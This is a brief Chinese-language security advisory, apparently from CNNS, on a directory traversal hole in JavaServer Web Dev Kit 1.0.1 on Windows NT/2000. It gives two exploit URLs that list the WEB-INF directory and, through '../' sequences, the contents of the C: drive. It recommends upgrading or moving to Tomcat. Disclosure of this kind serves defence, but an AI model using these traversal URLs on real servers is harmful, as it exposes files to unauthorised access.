涉及程序: JavaServer Web Dev Kit(JSWDK) 描述: JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞 详细: 发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞, 攻击者通过构造特殊的 URL 请求能访问未授权文件。 exploits: http://localhost:8080/examples//WEB-INF/ 会列出 /WEB-INF/ 目录 . http://localhost:8080/../examples//WEB-INF/../../../../../ 如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件 受影响系统: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 解决方案: CNNS 建议您升级 JSWDK 版本 建议您升级到tomcat.
